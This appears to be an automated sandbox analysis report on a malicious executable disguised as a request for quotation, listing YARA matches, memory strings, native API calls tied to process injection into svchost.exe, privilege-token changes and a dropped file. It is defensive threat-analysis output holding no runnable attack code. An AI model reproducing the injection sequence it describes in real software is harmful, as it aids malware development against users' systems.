Source: Yara match	File source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2750875662.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2742686769.0000000002310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1948226001.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1950189449.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2751208214.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1952345279.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2753929696.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2750881056.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00403B3A
Source: RFQ _ Virtue 054451000085.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000000.1487355744.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ce600bb4-6
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000000.1487355744.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_993a2721-e
Source: RFQ _ Virtue 054451000085.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f4b1d4ef-c
Source: RFQ _ Virtue 054451000085.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_c0281e06-7

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: RFQ _ Virtue 054451000085.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0042CBC3 NtClose,	10_2_0042CBC3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72B60 NtClose,LdrInitializeThunk,	10_2_03A72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_03A72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_03A72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A735C0 NtCreateMutant,LdrInitializeThunk,	10_2_03A735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A74340 NtSetContextThread,	10_2_03A74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A74650 NtSuspendThread,	10_2_03A74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72BA0 NtEnumerateValueKey,	10_2_03A72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72B80 NtQueryInformationFile,	10_2_03A72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72BE0 NtQueryValueKey,	10_2_03A72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72BF0 NtAllocateVirtualMemory,	10_2_03A72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72AB0 NtWaitForSingleObject,	10_2_03A72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72AF0 NtWriteFile,	10_2_03A72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72AD0 NtReadFile,	10_2_03A72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72FA0 NtQuerySection,	10_2_03A72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72FB0 NtResumeThread,	10_2_03A72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72F90 NtProtectVirtualMemory,	10_2_03A72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72FE0 NtCreateFile,	10_2_03A72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72F30 NtCreateSection,	10_2_03A72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72F60 NtCreateProcessEx,	10_2_03A72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72EA0 NtAdjustPrivilegesToken,	10_2_03A72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72E80 NtReadVirtualMemory,	10_2_03A72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72EE0 NtQueueApcThread,	10_2_03A72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72E30 NtWriteVirtualMemory,	10_2_03A72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72DB0 NtEnumerateKey,	10_2_03A72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72DD0 NtDelayExecution,	10_2_03A72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72D30 NtUnmapViewOfSection,	10_2_03A72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72D00 NtSetInformationFile,	10_2_03A72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72D10 NtMapViewOfSection,	10_2_03A72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72CA0 NtQueryInformationToken,	10_2_03A72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72CF0 NtOpenProcess,	10_2_03A72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72CC0 NtQueryVirtualMemory,	10_2_03A72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72C00 NtQueryInformationProcess,	10_2_03A72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A72C60 NtCreateKey,	10_2_03A72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A73090 NtSetValueKey,	10_2_03A73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A73010 NtOpenDirectoryObject,	10_2_03A73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A739B0 NtGetContextThread,	10_2_03A739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A73D10 NtOpenProcessToken,	10_2_03A73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A73D70 NtOpenThread,	10_2_03A73D70

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0046A1EF

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00458310

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004651BD

Source: C:\Windows\System32\AppVClient.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\902dfe32f8c88b11.bin

Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0040E6A0	0_2_0040E6A0
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0042D975	0_2_0042D975
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0040FCE0	0_2_0040FCE0
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_004221C5	0_2_004221C5
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_004362D2	0_2_004362D2
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_004803DA	0_2_004803DA
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0043242E	0_2_0043242E
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_004225FA	0_2_004225FA
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0045E616	0_2_0045E616
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_004166E1	0_2_004166E1
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0043878F	0_2_0043878F
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00436844	0_2_00436844
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00480857	0_2_00480857
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00418808	0_2_00418808
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00468889	0_2_00468889
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0042CB21	0_2_0042CB21
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00436DB6	0_2_00436DB6
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00416F9E	0_2_00416F9E
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00413030	0_2_00413030
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0042F1D9	0_2_0042F1D9
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00423187	0_2_00423187
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00401287	0_2_00401287
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00421484	0_2_00421484
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00415520	0_2_00415520
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00427696	0_2_00427696
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00415760	0_2_00415760
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00421978	0_2_00421978
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00439AB5	0_2_00439AB5
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00529CC8	0_2_00529CC8
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00487DDB	0_2_00487DDB
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00421D90	0_2_00421D90
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0042BDA6	0_2_0042BDA6
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0040DF00	0_2_0040DF00
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00413FE0	0_2_00413FE0
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00BB00D9	0_2_00BB00D9
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B76EAF	0_2_00B76EAF
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B751EE	0_2_00B751EE
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00BB515C	0_2_00BB515C
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00BAD580	0_2_00BAD580
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00BA3780	0_2_00BA3780
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00BAC7F0	0_2_00BAC7F0
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00BB39A3	0_2_00BB39A3
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00BA5980	0_2_00BA5980
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B77B71	0_2_00B77B71
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B77F80	0_2_00B77F80
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00E819B0	0_2_00E819B0
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00B8A810	7_2_00B8A810
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00B67C00	7_2_00B67C00
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00B679F0	7_2_00B679F0
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00B92D40	7_2_00B92D40
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00B8EEB0	7_2_00B8EEB0
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00B892A0	7_2_00B892A0
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00B893B0	7_2_00B893B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00418BA3	10_2_00418BA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0040E855	10_2_0040E855
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_004010C8	10_2_004010C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_004010D0	10_2_004010D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0042F1D3	10_2_0042F1D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_004029F8	10_2_004029F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00402A00	10_2_00402A00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_004032D0	10_2_004032D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0041040A	10_2_0041040A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00410413	10_2_00410413
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00401500	10_2_00401500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00416DA3	10_2_00416DA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0040E643	10_2_0040E643
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00410633	10_2_00410633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_004026F0	10_2_004026F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0040E788	10_2_0040E788
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0040E793	10_2_0040E793
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4E3F0	10_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B003E6	10_2_03B003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFA352	10_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC02C0	10_2_03AC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0274	10_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B001AA	10_2_03B001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF81CC	10_2_03AF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A30100	10_2_03A30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ADA118	10_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC8158	10_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD2000	10_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3C7C0	10_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40770	10_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A64750	10_2_03A64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5C6E0	10_2_03A5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B00591	10_2_03B00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40535	10_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AEE4F6	10_2_03AEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF2446	10_2_03AF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF6BD7	10_2_03AF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFAB40	10_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3EA80	10_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B0A9A6	10_2_03B0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A56962	10_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A268B8	10_2_03A268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E8F0	10_2_03A6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4A840	10_2_03A4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A42840	10_2_03A42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABEFA0	10_2_03ABEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4CFE0	10_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A32FC8	10_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A82F28	10_2_03A82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A60F30	10_2_03A60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB4F40	10_2_03AB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A52E90	10_2_03A52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFCE93	10_2_03AFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFEEDB	10_2_03AFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFEE26	10_2_03AFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40E59	10_2_03A40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A58DBF	10_2_03A58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3ADE0	10_2_03A3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4AD00	10_2_03A4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE0CB5	10_2_03AE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A30CF2	10_2_03A30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40C00	10_2_03A40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A8739A	10_2_03A8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF132D	10_2_03AF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2D34C	10_2_03A2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A452A0	10_2_03A452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AE12ED	10_2_03AE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5B2C0	10_2_03A5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4B1B0	10_2_03A4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A7516C	10_2_03A7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2F172	10_2_03A2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B0B16B	10_2_03B0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF70E9	10_2_03AF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFF0E0	10_2_03AFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AEF0CC	10_2_03AEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A470C0	10_2_03A470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFF7B0	10_2_03AFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF16CC	10_2_03AF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ADD5B0	10_2_03ADD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF7571	10_2_03AF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFF43F	10_2_03AFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A31460	10_2_03A31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5FB80	10_2_03A5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB5BF0	10_2_03AB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A7DBF9	10_2_03A7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFFB76	10_2_03AFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ADDAAC	10_2_03ADDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A85AA0	10_2_03A85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AEDAC6	10_2_03AEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB3A6C	10_2_03AB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFFA49	10_2_03AFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF7A46	10_2_03AF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD5910	10_2_03AD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A49950	10_2_03A49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5B950	10_2_03A5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A438E0	10_2_03A438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAD800	10_2_03AAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFFFB1	10_2_03AFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A41F92	10_2_03A41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFFF09	10_2_03AFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A49EB0	10_2_03A49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5FDC0	10_2_03A5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF7D73	10_2_03AF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A43D40	10_2_03A43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF1D5A	10_2_03AF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFFCF2	10_2_03AFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB9C32	10_2_03AB9C32
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 11_2_00CD7C00	11_2_00CD7C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 11_2_00CFA810	11_2_00CFA810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 11_2_00CD79F0	11_2_00CD79F0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 11_2_00D02D40	11_2_00D02D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 11_2_00CF92A0	11_2_00CF92A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 11_2_00CFEEB0	11_2_00CFEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 11_2_00CF93B0	11_2_00CF93B0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Jump to behavior

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: String function: 00428900 appears 41 times
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: String function: 00420AE3 appears 70 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03AAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A2B970 appears 272 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A87E54 appears 100 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03ABF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03A75130 appears 56 times

Source: elevation_service.exe0.0.dr	Static PE information: Number of sections : 12 > 10
Source: elevation_service.exe.0.dr	Static PE information: Number of sections : 12 > 10

Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1535764226.0000000004FE3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ _ Virtue 054451000085.exe
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1535372793.000000000518D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ _ Virtue 054451000085.exe
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1518974434.0000000004190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs RFQ _ Virtue 054451000085.exe
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1495945542.0000000003F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs RFQ _ Virtue 054451000085.exe
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1491215676.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs RFQ _ Virtue 054451000085.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys

Source: RFQ _ Virtue 054451000085.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: RFQ _ Virtue 054451000085.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
